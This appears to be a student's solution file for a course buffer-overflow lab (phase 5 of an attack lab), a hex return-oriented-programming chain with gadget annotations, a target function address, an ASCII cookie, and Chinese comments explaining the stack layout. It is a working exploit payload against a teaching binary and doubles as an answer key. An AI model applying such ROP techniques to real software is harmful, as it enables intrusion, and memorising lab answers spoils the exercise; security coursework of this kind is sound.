00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00
ab 1b 40 00 00 00 00 00		/* mov %rsp, %rax (48 89 e0 c3) */
3b 1b 40 00 00 00 00 00		/* mov %rax, %rdi (48 89 c7 c3) */
4a 1b 40 00 00 00 00 00		/* pop $rax 	  (58 c3) 	*/
48 00 00 00 00 00 00 00		/* buffer size is 40, plus 8 instructions. 0x48 = 72 bytes) */
42 1c 40 00 00 00 00 00		/* movl %eax, %ecx (89 c1) */
f3 1b 40 00 00 00 00 00		/* movl %ecx, %edx (89 ca) */
7c 1b 40 00 00 00 00 00		/* movl %edx, %esi (89 d6) */
75 1b 40 00 00 00 00 00		/* lea (%rdi, %rsi, 1), %rax */
3b 1b 40 00 00 00 00 00		/* mov %rax, %rdi (48 89 c7 c3) */
9c 1a 40 00 00 00 00 00		/* address of touch3 */
35 66 66 37 36 32 66 39		/* cookie in ASCII */
00 00 00 00 00 00 00 00

/* 拿到 rsp 存着的地址 */
/* (然后把这个地址) + (cookie 在 stack 偏移量) pop 到某个寄存器中 */
/* 然后把这个寄存器的值放到 rdi 中 */
/* 然后调用 touch3 */
/* cookie 要放到 stack 最后面 */
/* 字符串最后加上 \0 也就是 00000000 来标志结束 */